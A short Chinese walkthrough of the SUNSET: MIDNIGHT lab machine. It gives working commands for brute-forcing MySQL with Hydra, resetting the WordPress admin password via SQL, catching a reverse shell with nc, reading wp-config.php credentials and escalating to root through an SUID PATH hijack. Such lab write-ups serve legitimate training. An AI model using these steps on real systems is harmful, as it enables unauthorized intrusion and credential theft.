SUNSET: MIDNIGHT靶机
1.浏览器输入地址打开网页;
根据页面提示发现此网站的CMS是wordpress;
2.端口扫描
扫描完成后发现就开了三个端口,没什么更多的信息了;
3.Wpscan枚举;
根据前面的信息知道网站的CMS是Wordpress,用Wpscan工具扫描之后依然没有得到更多有价值的信息;
4.Hydra暴力破解数据库
hydra -l root -P /usr/share/wordlists/rockyou.txt 10.36.101.114 mysql
通过暴力破解拿到了mysql的数据库的用户名和密码
5.登录数据库;
成功登录数据库之后看到了admin用户的密码,但是无法进行解密,用语句进行修改;
update wp_users set user_pass=md5('admin') where user_login='admin';
6.登录Wordpress后台上传shell
附一个Wordpress上传shell链接https://secnhack.in/upload-shell-on-wordpress-site/
在kali里面使用nc -lvp 1234监听端口,可以成功反弹shell;
在/var/www/html/wordpress/wp-config.php这个文件里面找到了登录所用的用户和密码;
7.SSH登录靶机;
8.查找拥有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
利用这里靠好大哥教授一招利用成功,直接获取root权限;
export PATH=/tmp/:$PATH
cd /tmp
echo "/bin/sh">service
/usr/bin/status
SUNSET: MIDNIGHT靶机相关推荐
- 靶机渗透练习90-Grotesque:1.0.1
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——Noontide
Vulnhub靶机Noontide渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞利用: ③:SSH登 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- HA: InfinityStones靶机渗透测试
文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...
- HA: Forensics靶机渗透测试
文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
- HA: Dhanush靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...
- Lampiao靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...
- 【3月30日直播】新冠病毒全基因组测序——Midnight试剂盒及整体解决方案
识别上方二维码 或点击「阅读原文」 免费报名参加 新冠疫情肆虐全球,基于Nanopore测序技术和数据分析在全球感染性疾病防控中的优势充分显现出来.该平台使用灵活.操作简便.产出快速.分析实时等特征为 ...
- 漏洞payload 靶机_【CS学习笔记】5、如何建立Payload处理器
这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人. 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A ...
最新文章
- Java异常信息处理类
- Linux加密和安全
- RabbitMQ学习笔记四:RabbitMQ命令(附疑难问题解决)
- ROW_NUMBER() 分页
- 《互联网项目运营分析》第四章 :互联网项目的技术选择与应用
- 2020-12-6(从反汇编理解指针和引用的区别)
- GDCM:gdcm::IODs的测试程序
- mapreduce的shuffle机制(来自学习笔记)
- linux系统安装nc,Lifelong learner.
- php暂停循环,在特定数量的递归循环后,PHP停止执行
- MyBatis中SQL语句相关内容
- 服务器响应401,服务器返回HTTP响应代码:401,URL:https
- 【转】【Java/Android】Toast使用方法大全
- 关于Maven本地仓库中存在依赖时,重新下载was cached in the local repository错误
- 说说Asp.net 身份验证、授权
- springmvc.xml或spring.xml 能运行配置文件总是出现错误
- 如何JOPtionPane的showConfirmDialog对话框button设置监视器
- 安卓逆向 -- JEB3.7安装使用
- c语言变量格式化,C语言新手入门之格式化输出和变量类型
- 在method方法被调用之后,仅打印出a=100,b=200,请写出method方法的代码
热门文章
- 基于easyx的c++贪吃蛇
- Adavanced Installer 用户自定义行为——卸载时删除残留日志文件
- Eden's sharing : Supercharger
- 视通助力中国航天某院多媒体会议室建设
- 压力测试工具WCAT
- ABP +VUE Elment 通用高级查询(右键菜单)设计+LINQ通用类Expression<Func<TFields, bool>>方法
- Tikz作图教程:如何画流程图?——从一个简单的例子谈起
- B - Magical Subsequence
- Dangling meta character '+' near index 0 + 报错 解决方法
- qq音乐获取歌曲源链接地址